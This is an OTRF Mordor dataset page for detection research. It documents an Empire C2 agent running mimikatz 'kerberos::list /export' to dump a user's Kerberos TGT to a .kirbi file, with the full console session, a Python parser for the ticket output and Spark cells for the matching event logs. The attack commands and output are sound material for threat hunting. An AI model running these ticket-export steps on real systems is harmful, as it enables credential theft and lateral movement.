Empire Mimikatz Extract Kerberos Keys

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2019/09/21

Tactics

['TA0006']

Techniques

['T1003.004']

Tags

['Kerberos Tickets']

Dataset Description

This dataset represents an adversary extracting Kerberos tickets from memory on a domain-joined workstation. Empire's powershell/credentials/mimikatz/extract_tickets module runs Invoke-Mimikatz with the commands standard::base64 and kerberos::list /export. The module needs no admin rights (NeedsAdmin: False) because kerberos::list asks the LSA for the calling logon session's ticket cache instead of reading LSASS memory, so what comes back is the agent user's own tickets (here pgustavo's TGT), and /export writes each one to a .kirbi file on disk.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author    Name    Link
(no community notebooks listed for this dataset)

Simulation Plan

Environment     Tool Type    Module
Mordor shire    C2           extract_tickets

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
WE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5972   5/0.0    2020-09-22 07:35:29  http            

(Empire: agents) > interact WE8XYD3K
(Empire: WE8XYD3K) > usemodule credentials/mimikatz/extract_tickets
(Empire: powershell/credentials/mimikatz/extract_tickets) > info

              Name: Invoke-Mimikatz extract kerberos tickets.
            Module: powershell/credentials/mimikatz/extract_tickets
        NeedsAdmin: False
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  @JosephBialek
  @gentilkiwi

Description:
  Runs PowerSploit's Invoke-Mimikatz function to extract
  kerberos tickets from memory in base64-encoded form.

Comments:
  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com

Options:

  Name  Required    Value                     Description
  ----  --------    -------                   -----------
  Agent True        WE8XYD3K                  Agent to run module on.                 

(Empire: powershell/credentials/mimikatz/extract_tickets) > execute
[*] Tasked WE8XYD3K to run TASK_CMD_JOB
[*] Agent WE8XYD3K tasked with task ID 1
[*] Tasked agent WE8XYD3K to run module powershell/credentials/mimikatz/extract_tickets
(Empire: powershell/credentials/mimikatz/extract_tickets) > 
Job started: PY68ZG

Hostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # standard::base64
isBase64InterceptInput  is false
isBase64InterceptOutput is false

mimikatz(powershell) # kerberos::list /export

[00000000] - 0x00000012 - aes256_hmac      
  Start/End/MaxRenew: 9/22/2020 3:31:24 AM ; 9/22/2020 1:31:24 PM ; 9/29/2020 3:31:24 AM
  Server Name       : krbtgt/THESHIRE.LOCAL @ THESHIRE.LOCAL
  Client Name       : pgustavo @ THESHIRE.LOCAL
  Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; 
  * Saved to file     : 0-40e10000-pgustavo@krbtgt~THESHIRE.LOCAL-THESHIRE.LOCAL.kirbi

(Empire: powershell/credentials/mimikatz/extract_tickets) >
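The single ticket entry printed by kerberos::list /export above packs several things a hunter wants to read back out: the encryption type, the ticket lifetime and renewal window, whether the ticket is a TGT, the Flags bitmask, and the file the ticket was written to. The following Python is an added example (not code from the Mordor project, Empire or mimikatz) that parses that entry as copied from the output above and decodes the Flags value with the KERB_TICKET_FLAGS_* bit masks from the Windows ntsecapi.h header. The .kirbi filename pattern is inferred from the one file name on this page and is an assumption, not a documented format.

```python
import re
from datetime import datetime

# The entry below is copied from the kerberos::list /export output on this page.
SAMPLE_ENTRY = """\
[00000000] - 0x00000012 - aes256_hmac
  Start/End/MaxRenew: 9/22/2020 3:31:24 AM ; 9/22/2020 1:31:24 PM ; 9/29/2020 3:31:24 AM
  Server Name       : krbtgt/THESHIRE.LOCAL @ THESHIRE.LOCAL
  Client Name       : pgustavo @ THESHIRE.LOCAL
  Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
  * Saved to file     : 0-40e10000-pgustavo@krbtgt~THESHIRE.LOCAL-THESHIRE.LOCAL.kirbi
"""

# KERB_TICKET_FLAGS_* bit masks from the Windows ntsecapi.h header, lowest bit
# first, which is also the order mimikatz prints the names in.
KERB_TICKET_FLAGS = [
    ("name_canonicalize", 0x00010000),
    ("ok_as_delegate",    0x00040000),
    ("hw_authent",        0x00100000),
    ("pre_authent",       0x00200000),
    ("initial",           0x00400000),
    ("renewable",         0x00800000),
    ("invalid",           0x01000000),
    ("postdated",         0x02000000),
    ("may_postdate",      0x04000000),
    ("proxy",             0x08000000),
    ("proxiable",         0x10000000),
    ("forwarded",         0x20000000),
    ("forwardable",       0x40000000),
    ("reserved",          0x80000000),
]

TIMESTAMP = "%m/%d/%Y %I:%M:%S %p"   # the US-locale form mimikatz printed above


def decode_ticket_flags(flags):
    """Names of the ticket-flag bits set in a 32-bit KERB_TICKET_FLAGS value."""
    return [name for name, mask in KERB_TICKET_FLAGS if flags & mask]


def parse_kerberos_list_entry(text):
    """Parse one kerberos::list entry into a dict; a truncated entry raises
    ValueError rather than coming back half-filled."""
    head   = re.search(r"\[(\d+)\] - 0x([0-9a-fA-F]+) - (\w+)", text)
    times  = re.search(r"Start/End/MaxRenew:\s*(.+?) ; (.+?) ; (.+?)\s*$", text, re.M)
    server = re.search(r"Server Name\s*:\s*(\S+) @ (\S+)", text)
    client = re.search(r"Client Name\s*:\s*(\S+) @ (\S+)", text)
    flags  = re.search(r"Flags ([0-9a-fA-F]{8})\s*:", text)
    saved  = re.search(r"Saved to file\s*:\s*(\S+)", text)
    if not all((head, times, server, client, flags)):
        raise ValueError("not a complete kerberos::list entry")
    flag_value = int(flags.group(1), 16)
    return {
        "index": int(head.group(1)),
        "etype": int(head.group(2), 16),          # 0x12 = 18 = aes256-cts-hmac-sha1-96
        "etype_name": head.group(3),
        "start": datetime.strptime(times.group(1), TIMESTAMP),
        "end": datetime.strptime(times.group(2), TIMESTAMP),
        "max_renew": datetime.strptime(times.group(3), TIMESTAMP),
        "server": server.group(1),
        "server_realm": server.group(2),
        "client": client.group(1),
        "client_realm": client.group(2),
        "flags": flag_value,
        "flag_names": decode_ticket_flags(flag_value),
        "saved_to": saved.group(1) if saved else None,
    }


def is_tgt(entry):
    """A ticket whose service is krbtgt/<REALM> is a ticket-granting ticket."""
    return entry["server"].startswith("krbtgt/")


def lifetime_hours(entry):
    return (entry["end"] - entry["start"]).total_seconds() / 3600


def renew_window_days(entry):
    return (entry["max_renew"] - entry["start"]).total_seconds() / 86400


def expected_kirbi_name(entry):
    """Filename mimikatz used for the export. The pattern (index, flags, client,
    service with '/' replaced by '~', service realm) is inferred from the single
    file name on this page and is an assumption, not a documented format."""
    return "{}-{:08x}-{}@{}-{}.kirbi".format(
        entry["index"], entry["flags"], entry["client"],
        entry["server"].replace("/", "~"), entry["server_realm"])


if __name__ == "__main__":
    e = parse_kerberos_list_entry(SAMPLE_ENTRY)
    print("TGT" if is_tgt(e) else "service ticket", "for", e["client"],
          "flags:", ", ".join(e["flag_names"]),
          "valid %.0fh, renewable for %.0f days" % (lifetime_hours(e), renew_window_days(e)))
    print("export file matches:", expected_kirbi_name(e) == e["saved_to"])
```

The decoded flags are what make the exported file interesting to an attacker: forwardable on a TGT means it can be used to obtain forwarded tickets for delegation, initial and pre_authent say it came straight from an AS exchange with pre-authentication, and the MaxRenew column shows that the stolen .kirbi stays renewable for seven days beyond its ten-hour lifetime.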

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *   # OTRF helpers: get_spark() and registerMordorSQLTable()
spark = get_spark()                  # local SparkSession the cells below query through

Download & Process Mordor File

# The dataset is a zipped JSON export of Windows event logs; the helper downloads
# it and exposes the events as a temporary SparkSQL view named "mordorTable".
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_mimikatz_extract_keys.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

# Event volume per host, log channel and event ID: a first look at which
# telemetry sources the dataset actually contains before writing analytics.
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |3684 |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |3478 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |2316 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |903  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |847  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |400  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |254  |
|WORKSTATION6.theshire.local|security                                |4658   |244  |
|WORKSTATION6.theshire.local|security                                |4690   |122  |
|WORKSTATION6.theshire.local|security                                |4656   |122  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |87   |
|WORKSTATION6.theshire.local|security                                |4703   |71   |
|WORKSTATION5.theshire.local|security                                |4658   |70   |
|WORKSTATION6.theshire.local|security                                |4663   |59   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |53   |
|WORKSTATION5.theshire.local|security                                |4663   |35   |
|WORKSTATION5.theshire.local|security                                |4656   |35   |
|WORKSTATION5.theshire.local|security                                |4690   |35   |
|WORKSTATION6.theshire.local|security                                |5158   |34   |
|MORDORDC.theshire.local    |Security                                |5156   |33   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows